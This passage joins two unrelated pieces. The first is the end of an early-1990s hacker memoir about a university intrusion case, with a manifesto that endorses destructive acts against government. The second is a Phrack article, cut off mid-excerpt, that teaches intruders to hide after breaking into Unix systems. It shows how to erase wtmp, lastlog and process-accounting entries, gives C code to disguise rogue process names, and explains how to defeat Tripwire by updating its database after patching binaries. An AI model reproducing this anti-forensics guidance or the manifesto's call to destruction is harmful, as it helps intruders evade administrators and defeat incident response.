Finally talking to the _pro bono_ attorneys, we found that we were entitled to a reduction in rates of almost fifty per cent. This generosity brought the best price down to around three thousand dollars, which was three thousand dollars more than we could afford. So we contacted the public defender's office. Friends told me that a five thousand dollar attorney is worse, even, than a public defender; and that it takes at least twenty thousand to retain an attorney with capable of winning anything but the most open-and-shut criminal case. After a certain amount of bureaucratic runaround, we were assigned two attorneys. One, Deborah Lux, was the Assistant Chief Public Defender; the other, Dale's attorney, was Bradley Lunsford, a sharp, young attorney who seemed too good to be true. We discussed the case with our new attorneys, and were told that the best action we could take to defend ourselves was to do nothing. This is true. Anything we had attempted in our own defense, with the exception of contacting the complaining party, had been harmful to our case. Any discussions we had with the police were taped and examined for anything incriminating. A letter to the district attorney was ignored entirely. Do absolutely nothing without legal counsel. Most legal counsel will advise you to do nothing. Legal counsel has more leverage than you do, and can make binding deals with the police. You can't. We discussed possible defenses. As none of the systems into which I had intruded had any sort of warning against unauthorized access, this was considered a plausible defense. The almost exclusive use of 'guest' accounts was also beneficial. A more technical issue is the Best Evidence rule. We wondered whether a court would allow hardcopy as evidence, when the original document was electronic. As it happens, hardcopy is often admissible due to loopholes in this rule, even though hardcopy is highly susceptible to falsification by the police; and most electronic mail has no built-in authentication to prove identity. Still, without anything more damaging than electronic mail, a case would be very difficult to prosecute. However, with what almost amounted to a taped confession, the chance of a conviction was increased. We went over the arrest warrant affidavit, and my corrections to it, with a mixture of amusement and consternation. "So what do you think of this?" asked Dale. After a moment of thought, Deb Lux said: "This is gibberish." "I just had a case where a guy pumped four bullets into his brother-in-law, just because he didn't like him, and the arrest warrant for that was two pages long. One and a half, really," said Brad. "Does this help us, at all, that this arrest warrant is just demonstrably false, that it literally has over a hundred mistakes in it?" I asked. "Yeah, that could help," said Brad. We agreed to meet at the arraignment. XIV. The Stairwells of Justice The arraignment was a simple procedure, and was over in five minutes. Prior to our arraignment, five other people were arraigned on charges of varying severity, mainly such heinous crimes as smoking marijuana or vandalism. Dale stepped in front of the desk first. He was informed of the charges against him, asked if he understood them, and that was it. I stepped up, but when the judge asked me whether I understood the charges, I answered that I didn't, and that the charges were incomprehensible to a sane human being. I had hoped for some sort of response, but that was it for me, too. A trial date was set, once again months in advance. A week before the date arrived, it was once again postponed. During this week, we were informed that Dale's too good to be true attorney, Brad Lunsford, had went over to the District Attorney's office. He was replaced by Dave Crowley, the Chief District Attorney, a perpetually bitter, pock-faced older man with the demeanor and bearing of an angry accountant. Crowley refused to consider any of the strategies we had discussed at length with Brad and Deb. Dale was understandably irate at the sudden change, as was I, for when Deb and I were attempting to discuss the case he would interject rude comments. Finally, after some particularly snide remark, I told him to fuck off, or something similarly pleasant, and left. Dale and I tried to limit our dealings to Deb, and it was Deb who handled both of our cases to the end, for which I thank God. The day arrived. We dressed quite sharply, Dale in new wool slacks and jacket. I dressed in a new suit as well, and inserted a carnation in my buttonhole as a gesture of contempt for the proceedings. Dale looked so sharp that he was mistaken for an attorney twice. I did not share this distinction, but I looked sharp enough. I had shaved my beard a month previously after an error in trimming, so I looked presentable. We realized that judges base their decisions as much on your appearance as on what you say. We did not intend to say anything, so appearance was of utmost importance. We arrived at about the same time as at least thirty assorted computer security professionals, police, witnesses and ancillary court personnel. Dhamir Mannai and Richard Devon were there as well, and we exchanged greetings. Richard Devon was optimistic about the outcome, as was Dhamir Mannai. The computer security people gathered into a tight, paranoid knot, and Richard Devon and Dhamir Mannai stood about ten feet away from them, closer to us than to them. Robert Owens, Angela Thomas, Bryan Jensen, and Dan Ehrlich were there, among others. They seemed nervous and ill-at-ease in their attempt at formal dress. Occasionally, one or another would glare at us, or at Devon and Mannai. I smiled and waved. A discussion of some sort erupted among the computer security people, and a bailiff emerged and requested that they be quiet. The second time this was necessary, he simply told them to shut up, and told them to take their discussion to the stairwells. Dale and I had known of the noise policy for some time, and took all attorney-client conferences to the stairwells, which were filled at all times with similar conferences. It seemed that all the hearings and motions were just ceremonies without meaning; all the decisions had been made, hours before, in the stairwells of justice. Finally Deb Lux arrived, with a sheaf of documents, and immediately left, saying that she would return shortly. A little over twenty minutes later, she returned to announce that she had struck a deal with Eileen Tucker, the Assistant District Attorney. In light of the garbled nature of the police testimony, the spuriousness of the arrest warrant affidavit, the hostility of their main witness, Dhamir Mannai, and the difficulty of prosecuting a highly technical case, the Office of the District Attorney was understandably reluctant to prosecute us. I was glad not to have to deal with Eileen Tucker, a woman affectionately nicknamed by other court officials "The Wicked Witch of the West." With her pallid skin, and her face drawn tightly over her skull as if she had far too much plastic surgery, this seemed an adequately descriptive name, both as to appearance and personality. The deal was Advanced Rehabilitative Disposition, a pre-trial diversion in which you effectively receive probation and a fine, and charges are dismissed, leaving you with no criminal record. This is what first-time drunk drivers usually receive. It is essentially a bribe to get the cops off your back. The fines were approximately two thousand dollars apiece, with Dale arbitrarily receiving a fine two hundred dollars greater than mine. After a moment of thought, we decided that the fines were too large. We turned down the deal, and asked her if she could get anything better than that. After a much shorter conference she returned, announcing that the fines had been dropped by about a third. Still unsatisfied, but realizing that the proceedings, trial, jury selection, delays, sentencing, motions of discovery and almost limitless writs and affidavits and appeals would take several more months, we agreed to the deal. It was preferable to more hellish legal proceedings. We discussed the deal outside with Richard Devon; Dhamir Mannai had left, having pressing engagements both before and after his testimony had been scheduled. We agreed that a trial would probably have resulted in an eventual victory, but at what unaffordable cost? We had no resources or time for a prolonged legal battle, and no acceptable alternative to a plea-bargain. XV. The End? Of Course Not; There Is No End This, we assumed incorrectly, was the end. There was still a date for sentencing, and papers to be signed. Nevertheless, this was all a formality, and weeks distant. There was time to prepare for these proceedings. The hounds of spring were on winter's traces. Dale and I hoped to return to what was left of our lives, and to enjoy the summer. This hope was not to be fulfilled. For, while entering the Electronic Music Lab one fine spring night, Andy Ericson [*], a locally-renowned musician, was halted by the University Police outside the window, as he prepared to enter. We quickly explained that we were authorized to be present, and immediately presented appropriate keys, IDs and other evidence that we were authorized to be in the Lab. Nevertheless, more quickly than could be imagined, the cops grabbed Andy and slammed him against a cruiser, frisking him for weapons. They claimed that a person had been sighted carrying a firearm on campus, and that they were investigating a call. No weapons were discovered. However, a small amount of marijuana and a tiny pipe were found on him. Interestingly, the police log in the paper the following day noted the paraphernalia bust, but there was no mention of any person carrying a firearm on campus. Andy, a mathematician pursuing a Master's Degree, was performing research in a building classified Secret, and thus required a security clearance to enter the area where he performed his research. His supervisor immediately yanked his security clearance, and this greatly jeopardized his chances of completing his thesis. This is, as with my suspicions of wiretapping, an incident in which circumstantial evidence seems to justify my belief that the police were, even then, continuing surveillance on my friends and on me. However, as with my wiretapping suspicions, there is a maddening lack of substantial evidence to confirm my belief beyond a reasonable doubt. Still, the police continued their series of visits to the Lab, under one ruse or another. Jeffery Jones, one night, threatened to arrest Dale for being in the Electronic Music Lab, though he had been informed repeatedly that Dale's access was authorized by the School of Music. Dale turned over his keys to Police Services the following day, resenting it bitterly. This, however, was not to be a victory for the cops, but a crushing embarrassment. While their previous actions had remained at least within the letter of the law and of university policy, this was egregious and obvious harassment, and was very quickly quashed. Bob Wilkins, the supervisor of the Electronic Music Lab; Burt Fenner, head of the Electronic Music division; and the Dean of the College of Arts and Architecture immediately drafted letters to the University Police objecting to this illegal action; as it is the professors and heads of departments who authorize keys, and not the University Police. The keys were returned within three days. However, Jeffery was to vent his impotent rage in repeated visits to the Lab at late hours. On a subsequent occasion, he again threatened to arrest Dale, without providing any reason or justification for it. The police, Jeffery and others, always had some pretext for these visits, but the fact that these visits only occurred when Dale was present in the Lab, and that they visited no one else, seems to be solid circumstantial evidence that they were more than routine checkups. Once the authorities become interested in you, the file is never closed. Perhaps it will sit in a computer for ten or twenty years. Perhaps it will never be accessed again. However, perhaps some day in the distant future the police will be investigating some unrelated incident, and will once again note your name. You were in the wrong building, or talked to the wrong person. Suddenly, their long-dormant interest in you has reawakened. Suddenly, they once again want you for questioning. Suddenly, once again, they pull your life out from under you. This is the way democracies die, not by revolution or coups d'etat, not by the flowing of blood in the streets like water, as historical novelists so quaintly write. Democracies die by innumerable papercuts. Democracies die by the petty actions of petty bureaucrats who, like mosquitoes, each drain their little drop of life's blood until none is left. XVI. Lightning Always Strikes the Same Place Twice One day, Dale received in the mail a subpoena, which informed him that his testimony was required in the upcoming trial of Ron Gere, who had moved to Florida. The cops had charged him with criminal conspiracy in the creation of the Huang account at the Engineering Computer Lab. Now, not only was I guilty of being used as a weapon against a friend, but also guilty of this further complication, that the police were to use a friend of mine as a weapon against yet another friend. It is interesting to note the manner in which the police use betrayal, deceit and infamous methods to prosecute crime. It is especially interesting to note the increased use of such methods in the prosecution of crimes with no apparent victim. Indeed, in this specific case, the only victim with a demonstrable loss testified against the police and for the accused. Dale resolved to plead the Fifth to any question regarding Ron, and to risk contempt of court by doing so, rather than be used in this manner. This was not necessary. As it happened, Ron was to drive well over two thousand miles simply to sign a paper and receive ARD. The three of us commiserated, and then Ron was on his way back to Florida. XVII. Sentencing Dale and I reported to the appropriate courtroom for sentencing. In the hall, a young man, shackled and restrained by two police officers, was yelling: "I'm eighteen, and I'm having a very bad day!" The cops didn't bat an eye as they dragged him to the adjoining prison. We sat. The presiding judge, the Hon. David C. Grine, surveyed with evident disdain a room full of criminals like us. Deborah Lux was there, once again serving as counsel. David Crowley was mercifully absent. The judge briefly examined each case before him. For each case, he announced the amount of the fine, the time of probation, and banged his gavel. Immediately before he arrived at our case, he looked at a man directly to our left. Instead of delivering the usual ARD sentence, he flashed a sadistic grin and said: "Two years jail." Dealing marijuana was the crime. The man's attorney objected. The judge said: "Okay, two years, one suspended." The attorney, another flunky from the public defender's office, sat down again. Two cops immediately dragged the man from the courtroom to take him to jail. I noted that practically everyone in the room was poor, and those with whom I spoke were all uneducated. DUI was the most common offense. Judge Grine came to our case, announced the expected sentence, and we reported upstairs to be assigned probation officers. I was disgusted with myself for having agreed to this arrangement, and perhaps this was why I was surly with the probation officer, Thomas Harmon. This earned me a visit to a court-appointed psychiatrist, to determine if I were mentally disturbed or on drugs. That I was neither was satisfied by a single interview, and no drug-testing was necessary; for which I am grateful, for I would have refused any such testing. Exercising this Fifth Amendment- guaranteed right is, of course, in this day considered to be an admission of guilt. The slow destruction of this right began with the government policy of "implied consent," by which one signs over one's Fifth Amendment rights against self-incrimination by having a driver's license, allowing a police officer to pull you over and test your breath for any reason or for no reason at all. I later apologized to Thomas Harmon for my rudeness, as he had done me no disservice; indeed, a probation officer is, at least, in the business of keeping people out of jail instead of putting them there; and his behavior was less objectionable than that of any other police officer involved in my case. Very shortly thereafter, realizing that I knew a large number of the local police on a first-name basis, I left the area, with the stated destination of Indiana. I spent the next two years travelling, with such waypoints as New Orleans, Denver, Seattle and Casper, Wyoming; and did not touch a computer for three years, almost having a horror of them. I did not pay my fine in the monthly installments the court demanded. I ignored virtually every provision of my probation. I did not remain in touch with my probation officer, almost determined that my absence should be noticed. I did a lot of drugs, determined to obliterate all memory of my previous life. In Seattle, heroin was a drug of choice, so I did that for a while. Finally, I arrived at my stated destination, Indiana, with only about three months remaining in my probation, and none of my fines paid. Dale, without my knowledge, called my parents and convinced them to pay the fine. It took me a few days of thought to decide whether or not to accept their generous offer; I had not thought of asking them to pay the fine, sure that they would not. Perhaps I had done them a disservice in so assuming, but now I had to decide whether to accept their help. If my fines were not paid, my ARD would be revoked, and a new trial date would be set. I was half determined to return and fight this case, still ashamed of having agreed to such a deal under duress. However, after discussing it at exhaustive length with everyone I knew, I came to the conclusion that to do so would be foolish and quixotic. Hell, I thought, Thoreau did the same thing in a similar circumstance; why shouldn't I? I accepted my parents' offer. Three months later, I received a letter in the mail announcing that the case had been dismissed and my records expunged, with an annotation to the effect that records would be retained only to determine eligibility for any future ARD. I believe this to the same degree in which I believe that the NSA never performs surveillance on civilians. I have my doubts that the FBI eliminated all mention of me from their files. I shall decide after I file a Freedom of Information Act request and receive a reply. I now have a legitimate Internet account and due to my experiences with weak encryption am a committed cypherpunk and Clipper Chip proposal opponent. What is the moral to this story? Even now, when I have had several years to gain distance and perspective, there does not seem to be a clear moral; only several pragmatic lessons. I became enamored of my own brilliance, and arrogantly sure that my intelligence was invulnerability. I assumed my own immortality, and took a fall. This was not due to the intelligence of my adversaries, for the stupidity of the police was marvellous to behold. It was due to my own belief that I was somehow infallible. Good intentions are only as good as the precautions taken to ensure their effectiveness. There is always a Public Enemy Number One. As the public's fickle attention strays from the perceived menace of drug use, it will latch on to whatever new demon first appears on television. With the growing prevalence of hatchet jobs on hackers in the public media, it appears that hackers are to be the new witches. It is advisable, then, that we avoid behavior which would tend to confirm the stereotypes. For every Emmanuel Goldstein or R. U. Sirius in the public eye, there are a dozen Mitnicks and Hesses; and, alas, it is the Mitnicks and Hesses who gain the most attention. Those who work for the betterment of society are much less interesting to the media than malicious vandals or spies. In addition, it is best to avoid even the appearance of dishonesty in hacking, eschewing all personal gain. Phreaking or hacking for personal gain at the expense of others is entirely unacceptable. Possibly bankrupting a small company through excessive telephone fraud is not only morally repugnant, but also puts money into the coffers of the monopolistic phone companies that we despise. The goal of hacking is, and always has been, the desire for full disclosure of that information which is unethically and illegally hidden by governments and corporations; add to that a dash of healthy curiosity and a hint of rage, and you have a solvent capable of dissolving the thickest veils of secrecy. If destructive means are necessary, by all means use them; but be sure that you are not acting from hatred, but from love. The desire to destroy is understandable, and I sympathize with it; anyone who can not think of a dozen government bodies which would be significantly improved by their destruction is probably too dumb to hack in the first place. However, if that destruction merely leads to disproportionate government reprisals, then it is not only inappropriate but counterproductive. The secrecy and hoarding of information so common in the hacker community mirrors, in many respects, the secrecy and hoarding of information by the very government we resist. The desired result is full disclosure. Thus, the immediate, anonymous broadband distribution of material substantiating government and corporate wrongdoing is a mandate. Instead of merely collecting information and distributing it privately for personal amusement, it must be sent to newspapers, television, electronic media, and any other means of communication to ensure both that this information can not be immediately suppressed by the confiscation of a few bulletin board systems and that our true motives may be discerned from our public and visible actions. Our actions are not, in the wake of Operation Sun-Devil and the Clipper Chip proposal, entirely free. The government has declared war on numerous subsections of its own population, and thus has defined the terms of the conflict. The War on Drugs is a notable example, and we must ask what sort of a government declares war on its own citizens, and act accordingly. Those of us who stand for liberty must act while we still can. It is later than we think. "In Germany they first came for the Communists and I didn't speak up because I wasn't a Communist. Then they came for the Jews, and I didn't speak up because I wasn't a Jew. Then they came for the trade unionists, and I didn't speak up because I wasn't a trade unionist. Then they came for the Catholics, and I didn't speak up because I was a Protestant. Then they came for me--and by that time no one was left to speak up." Martin Niemoeller "They that can give up essential liberty to obtain a litle temporary safety deserver neither liberty nor safety." Benjamin Franklin --------- APPENDIX A [From cert-clippings] Date: Sat, 10 Mar 90 00:22:22 GMT From: thomas@shire.cs.psu.edu (Angela Marie Thomas) Subject: PSU Hackers thwarted The Daily Collegian Wednesday, 21 Feb 1990 Unlawful computer use leads to arrests ALEX H. LIEBER, Collegian Staff Writer Two men face charges of unlawful computer use, theft of services in a preliminary hearing scheduled for this morning at the Centre County Court of Common Pleas in Bellefonte. Dale Garrison, 111 S. Smith St., and Robert W. Clark, 201 Twin Lake Drive, Gettysburg, were arrested Friday in connection with illegal use of the University computer system, according to court records. Garrison, 36, is charged with the theft of service, unlawful computer use and criminal conspiracy. Clark, 20, is charged with multiple counts of unlawful computer use and theft of service. [...] Clark, who faces the more serious felony charges, allegedly used two computer accounts without authorization from the Center of Academic Computing or the Computer Science Department and, while creating two files, erased a file from the system. [...] When interviewed by University Police Services, Clark stated in the police report that the file deleted contained lists of various groups under the name of "ETZGREEK." Clark said the erasure was accidental, resulting from an override in the file when he tried to copy it over onto a blank file. According to records, Clark is accused of running up more than $1000 in his use of the computer account. Garrison is accused of running up more than $800 of computer time. Police began to investigate allegations of illegal computer use in November when Joe Lambert, head of the university's computer department, told police a group of people was accessing University computer accounts and then using those accounts to gain access to other computer systems. Among the systems accessed was Internet, a series of computers hooked to computer systems in industry, education and the military, according to records. The alleged illegal use of the accounts was originally investigated by a Computer Emergency Response Team at Carnegie-Mellon University, which assists other worldwide computer systems in investigating improper computer use. Matt Crawford, technical contact in the University of Chicago computer department discovered someone had been using a computer account from Penn State to access the University of Chicago computer system.  ==Phrack Magazine== Volume Four, Issue Forty-Three, File 14 of 27 #!/bin/sh # Playing Hide and Seek, Unix style. # By Phreak Accident # # A "how-to" in successfully hiding and removing your electronic footprints # while gaining unauthorized access to someone else's computer system (Unix in # this case). # Start counting .. Hmm. Sucks don't it? Breaking into a system but only to have your access cut off the next day. Right before you had the chance to download that 2 megabyte source code file you have been dying to get all year. Why was the access cut? Damn, you forgot to nuke that .rhosts file that you left in the root directory. Or maybe it was the wtmp entries you didn't bother to edit. Or perhaps the tcp_wrapper logs that you didn't bother to look for. Whatever it was, it just screwed your access and perhaps, just got you busted. ---- Simulated incident report follows: From: mark@abene.com (Mark Dorkenski) Message-Id: <9305282324.AA11445@jail.abene.com> To: incident-report@cert.org Subject: Cracker Breakin Status: RO To whom it may concern, Last night 2 of our machines were penetrated by an unauthorized user. Apparently the cracker (or crackers) involved didn't bother to clean up after they left. The following are logs generated from the time the break-in occurred. [/usr/adm/wtmp]: oracle ttyp1 192.148.8.15 Tue May 11 02:12 - 04:00 (02:12) sync ttyp2 192.148.8.15 Tue May 11 01:47 - 01:47 (00:00) robert console Mon May 10 06:00 - 04:15 (22:14) reboot ~ Mon May 10 05:59 shutdown ~ Sun May 9 11:04 [/usr/adm/messages]: May 11 02:02:54 abene.com login: 3 LOGIN FAILURES FROM 192.148.8.15 May 11 02:00:32 abene.com login: 4 LOGIN FAILURES FROM 192.148.8.15 [/usr/adm/pacct]: ls - oracle ttyp1 0.00 secs Tue May 2 19:37 cat - oracle ttyp1 0.00 secs Tue May 2 19:37 ls - oracle ttyp1 0.00 secs Tue May 2 19:37 ls - oracle ttyp1 0.00 secs Tue May 2 19:37 rdist - root ttyp1 0.00 secs Tue May 2 19:37 sh - root ttyp0 0.00 secs Tue May 2 19:37 ed - root ttyp0 0.00 secs Tue May 2 19:37 rlogin - root ttyp0 0.00 secs Tue May 2 19:37 ls - root ttyp0 0.00 secs Tue May 2 19:37 more - root ttyp0 0.00 secs Tue May 2 19:34 We have found and plugged the areas of vulnerability and have restored original binaries back to the system. We have already informed the proper authorities of the breakin, including the domain contact at the remote host in question. Can you please relay any information regarding incident reports in our area? Mark Dorkenski Network Operations ---- End of incident report Hey, it's human nature to be careless and lazy. But, when you're a hacker, and you're illegally breaking into computer systems this isn't a luxury that you can afford. Your efforts in penetrating have to be exact, concise, sharp, witty and skillful. You have to know when to retreat, run, hide, pounce or spy. Let us put it this way, when you get your feet muddy and walk on new carpet without cleaning it up, you're gonna get spanked. I can't tell you how many times I've see a hacker break into a system and leave their muddy footprints all over the system. Hell, a quarter of the hosts on the Internet need to be steam-cleaned. This is sad. Especially since you could have had the ability to do the washing yourself. Why bother cracking systems if you leave unauthorized login messages on the console for the administrators? Beats me. This article is about hiding your access--the little tricks of the trade that keep you unnoticed and hidden from that evil bastard, the system administrator. I should probably start by explaining exactly where common accounting/log files are kept and their roles in keeping/tracking system information. # Drinking jolt and jerking the logs Syslog(3), The "Big Daddy" of logging daemons, is the master of all system accounting and log reporting. Most system components and applications depend on syslogd to deliver the information (accounting, errors, etc.) to the appropriate place. Syslog (syslogd) reads a configuration file (/etc/syslog.conf) on startup to determine what facilities it will support. Syslog ususally has the following facilities and priorities: Facilities: kern user mail daemon auth syslog lpr news uucp Priorities: emerg alert crit err warning notice info debug Facilities are the types of accounting that occur and priorities are the level of urgency that the facilities will report. Most facilities are divided and logged into separate accounting files. The common being daemon, auth, syslog, and kern. Priorities are encoded as a facility and a level. The facility usually describes the part of the system generating the message. Priorities are defined in . In order to by-pass or suspend system accounting it is necessary to understand how it works. With syslog, it is important to know how to read and determine where accounting files are delivered. This entails understanding how syslog configures itself for operation. # Reading and understanding /etc/syslog.conf. Lines in the configuration file have a selector to determine the message priorities to which the line applies and an action. The action fields are separated from the selector by one or more tabs. Selectors are semicolon separated lists of priority specifiers. Each priority has a facility describing the part of the system that generated the message, a dot, and a level indicating the severity of the message. Symbolic names could be used. An asterisk selects all facilities. All messages of the specified level or higher (greater severity) are selected. More than one facility may be selected using commas to separate them. For example: *.emerg;mail,daemon.crit selects all facilities at the emerg level and the mail and daemon facil- ities at the crit level. Known facilities and levels recognized by syslogd are those listed in syslog(3) without the leading ``LOG_''. The additional facility ``mark'' has a message at priority LOG_INFO sent to it every 20 minutes (this may be changed with the -m flag). The ``mark'' facility is not enabled by a facility field containing an asterisk. The level ``none'' may be used to disable a particular facility. For example, *.debug;mail.none Sends all messages except mail messages to the selected file. The second part of each line describes where the message is to be logged if this line is selected. There are four forms: o A filename (beginning with a leading slash). The file will be opened in append mode. o A hostname preceded by an at sign (``@''). Selected messages are forwarded to the syslogd on the named host. o A comma separated list of users. Selected messages are written to those users if they are logged in. o An asterisk. Selected messages are written to all logged-in users. For example, the configuration file: kern,mark.debug /dev/console *.notice;mail.info /usr/spool/adm/syslog *.crit /usr/adm/critical kern.err @phantom.com *.emerg * *.alert erikb,netw1z *.alert;auth.warning ralph logs all kernel messages and 20 minute marks onto the system console, all notice (or higher) level messages and all mail system messages except debug messages into the file /usr/spool/adm/syslog, and all critical messages into /usr/adm/critical; kernel messages of error severity or higher are forwarded to ucbarpa. All users will be informed of any emergency messages, the users ``erikb'' and ``netw1z'' will be informed of any alert messages, or any warning message (or higher) from the authorization system. Syslogd creates the file /etc/syslog.pid, if possible, containing a single line with its process id; this is used to kill or reconfigure syslogd. # System login records There are there basic areas (files) in which system login information is stored. These areas are: /usr/etc/wtmp /usr/etc/lastlog /etc/utmp The utmp file records information about who is currently using the system. The file is a sequence of entries with the following structure declared in the include file (/usr/include/utmp.h): struct utmp { char ut_line[8]; /* tty name */ char ut_name[8]; /* user id */ char ut_host[16]; /* host name, if remote */ long ut_time; /* time on */ }; This structure gives the name of the special file associated with the user's terminal, the user's login name, and the time of the login in the form of time(3C). This will vary from platform to platform. Since Sun Microsystems ships SunOs with a world writable /etc/utmp, you can easily take yourself out of any who listing. The wtmp file records all logins and logouts. A null username indicates a logout on the associated terminal. Furthermore, the terminal name `~' indicates that the system was rebooted at the indicated time; the adjacent pair of entries with terminal names `|' and `{' indicate the system maintained time just before and just after a date command has changed the system's idea of the time. Wtmp is maintained by login(1) and init(8). Neither of these programs creates the file, so if it is removed or renamed record-keeping is turned off. Wtmp is used in conjunction with the /usr/ucb/last command. /usr/adm/lastlog is used by login(1) for storing previous login dates, times, and connection locations. The structure for lastlog is as follows: struct lastlog { time_t ll_time; char ll_line[8]; char ll_host[16]; }; The structure for lastlog is quite simple. One entry per UID, and it is stored in UID order. Creating a lastlog and wtmp editor is quite simple. Example programs are appended at the end of this file. # System process accounting Usually, the more security-conscience systems will have process accounting turned on which allows the system to log every process that is spawned. /usr/adm/acct or /usr/adm/pacct are the usual logfiles that store the accounting data. These files can grow quite large as you can imagine, and are sometimes shrunk by other system applications and saved in a compressed format as /usr/adm/savacct or something similar. Usually, if the accounting file is there with a 0 byte length then you can rest assured that they are not keeping process accounting records. If they are however, there are really only two methods of hiding yourself from this form of accounting. One, you can suspend or stop process accounting ( which is usually done with the "accton" command) or you can edit the existing process logfile and "wipe" your incriminating records. Here is the common structure for the process accounting file: struct acct { char ac_comm[10]; /* Accounting command name */ comp_t ac_utime; /* Accounting user time */ comp_t ac_stime; /* Accounting system time */ comp_t ac_etime; /* Accounting elapsed time */ time_t ac_btime; /* Beginning time */ uid_t ac_uid; /* Accounting user ID */ gid_t ac_gid; /* Accounting group ID */ short ac_mem; /* average memory usage */ comp_t ac_io; /* number of disk IO blocks */ dev_t ac_tty; /* control typewriter */ char ac_flag; /* Accounting flag */ }; It is extremely tricky to remove all of your account records since if you do use a program to remove them, the program that you run to wipe the records will still have a process that will be appended to the logfile after it has completed. An example program for removing process accounting records is included at the end of this article. Most sysadmins don't pay real attention to the process logs, since they do tend to be rather large and grow fast. However, if they notice that a break-in has occurred, this is one of the primary places they will look for further evidence. On the other hand, for normal system monitoring, you should be more worried about your "active" processes that might show up in a process table listing (such as ps or top). Most platforms allow the general changing of the process name without having any kind of privileges to do so. This is done with a simple program as noted below: #include #include int main(argc, argv) int argc; char **argv; { char *p; for (p = argv[0]; *p; p++) *p = 0; strcpy(argv[0], "rn"); (void) getchar (); /* to allow you to see that ps reports "rn" */ return(0); } Basically, this program waits for a key-stroke and then exits. But, while it's waiting, if you were to lookup the process it would show the name as being "rn". You're just actually re-writing the argument list of the spawned process. This is a good method of hiding your process or program names ("crack", "hackit", "icmpnuker"). Its a good idea to use this method in any "rogue" programs you might not want to be discovered by a system administrator. If you cant corrupt your process arguments, rename your program to something that at least looks normal on the system. But, if you do this, make sure that you don't run the command as "./sh" or "./ping" .. Even this looks suspicious. Put your current path in front of your PATH environment variable and avoid this mistake. # Tripping the wire That little piss-ant up at Purdue thinks he has invented a masterpiece.. I'll let his words explain what "Tripwire" is all about. Then, i'll go over some brief flaws in tripwire and how to circumvent it. ---- Tripwire README Introduction 1.0. Background ================ With the advent of increasingly sophisticated and subtle account break-ins on Unix systems, the need for tools to aid in the detection of unauthorized modification of files becomes clear. Tripwire is a tool that aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner. 1.1. Goals of Tripwire ======================= Tripwire is a file integrity checker, a utility that compares a designated set of files against information stored in a previously generated database. Any differences are flagged and logged, and optionally, a user is notified through mail. When run against system files on a regular basis, any changes in critical system files will be spotted -- and appropriate damage control measures can be taken immediately. With Tripwire, system administrators can conclude with a high degree of certainty that a given set of files remain free of unauthorized modifications if Tripwire reports no changes. ---- End of Tripwire excerpt Ok, so you know what tripwire does. Yup, it creates signatures for all files listed in a tripwire configuration file. So, if you were to change a file that is "tripwired", the proper authorities would be notified and your changes could be recognized. Gee. That sounds great. But there are a couple of problems with this. First, tripwire wasn't made to run continuously (i.e., a change to a system binary might not be noticed for several hours, perhaps days.) This allows somewhat of a "false" security for those admins who install tripwire. The first step in beating tripwire is to know if the system you are on is running it. This is trivial at best. The default location where tripwire installs its databases are /usr/adm/tcheck or /usr/local/adm/tcheck. The "tcheck" directory is basically made up of the following files: -rw------- 1 root 4867 tw.config drwxr----- 2 root 512 databases The file "tw.config" is the tripwire configuration file. Basically, it's a list if files that tripwire will create signatures for. This file usually consists of all system binaries, devices, and configuration files. The directory "databases" contains the actual tripwire signatures for every system that is configured in tw.config. The format for the database filenames are tw.db_HOSTNAME. An example signature entry might look like: /bin/login 27 ../z/. 100755 901 1 0 0 50412 .g53Lz .g4nrh .g4nrt 0 1vOeWR/aADgc0 oQB7C1cCTMd 1T2ie4.KHLgS0xG2B81TVUfQ 0 0 0 0 0 0 0 Nothing to get excited about. Basically it is a signature encrypted in one of the many forms supplied by tripwire. Hard to forge, but easy to bypass. Tripwire takes a long time to check each file or directory listed in the configuration file. Therefore, it is possible to patch or change a system file before tripwire runs a signature check on it. How does one do this? Well, let me explain some more. In the design of tripwire, the databases are supposed to be kept either on a secure server or a read-only filesystem. Usually, if you would want to patch a system binary 9 times out of 10 you're going to want to have root access. Having root access to by-pass tripwire is a must. Therefore, if you can obtain this access then it is perfectly logical that you should be able to remount a filesystem as Read/Write. Once accomplished, after installing your patched binary, all you have to do is: tripwire -update PATH_TO_PATCHED_BINARY Then, you must also: tripwire -update /usr/adm/tcheck/databases/tw.db_HOSTNAME (If they are making a signature for the tripwire database itself) You'll still be responsible for the changed inode times on the database. But that's the risk you'll have to live with. Tripewire wont detect the change since you updated the database. But an admin might notice the changed times. # Wrapping up the wrappers Ta da. You got the access. uh-oh. What if they are running a TCP wrapper? There are three basic ways they could be running a wrapper. 1) They have modified /etc/inetd.conf and replaced the daemons they want to wrap with another program that records the incoming hostname and then spawns the correct daemon. 2) They have replaced the normal daemons (usually in /usr/etc) with a program that records the hostname then launches the correct daemon. 3) They have modified the actual wrappers themselves to record incoming connections. In order to bypass or disable them, you'll first need to know which method they are using. First, view /etc/inetd.conf and check to see if you see something similar to: telnet stream tcp nowait root /usr/etc/tcpd telnetd ttyXX This is a sure sign that they are running Wietse Venema's tcp_wrapper. If nothing is found in /etc/inetd.conf, check /usr/etc and check for any abnormal programs such as "tcpd", "wrapd", and "watchcatd". Finally, if nothing is still found, try checking the actually daemons by running "strings" on them and looking for logfiles or by using sum and comparing them to another system of the same OS that you know is not using a wrapper. Okay, by now you know whether or not they have a wrapper installed. If so you will have to now decide what to do with the output of the wrapper. You'll have to know where it put the information. The most common wrapper used is tcp_wrapper. Here is another README excerpt detailing where the actually output from the wraps are delivered. ---- Begin of tcp_wrapper README 3.2 - Where the logging information goes ---------------------------------------- The wrapper programs send their logging information to the syslog daemon (syslogd). The disposition of the wrapper logs is determined by the syslog configuration file (usually /etc/syslog.conf). Messages are written to files, to the console, or are forwarded to a @loghost. Older syslog implementations (still found on Ultrix systems) only support priority levels ranging from 9 (debug-level messages) to 0 (alerts). All logging information of the same priority level (or more urgent) is written to the same destination. In the syslog.conf file, priority levels are specified in numerical form. For example, 8/usr/spool/mqueue/syslog causes all messages with priority 8 (informational messages), and anything that is more urgent, to be appended to the file /usr/spool/mqueue/syslog. Newer syslog implementations support message classes in addition to priority levels. Examples of message classes are: mail, daemon, auth and news. In the syslog.conf file, priority levels are specified with symbolic names: debug, info, notice, ..., emerg. For example, mail.debug /var/log/syslog causes all messages of class mail with priority debug (or more urgent) to be appended to the /var/log/syslog file. By default, the wrapper logs go to the same place as the transaction logs of the sendmail daemon. The disposition can be changed by editing the Makefile and/or the syslog.conf file. Send a `kill -HUP' to the syslogd after changing its configuration file. Remember that syslogd, just like sendmail, insists on one or more TABs between the left-hand side and the right-hand side expressions in its configuration file. ---- End of 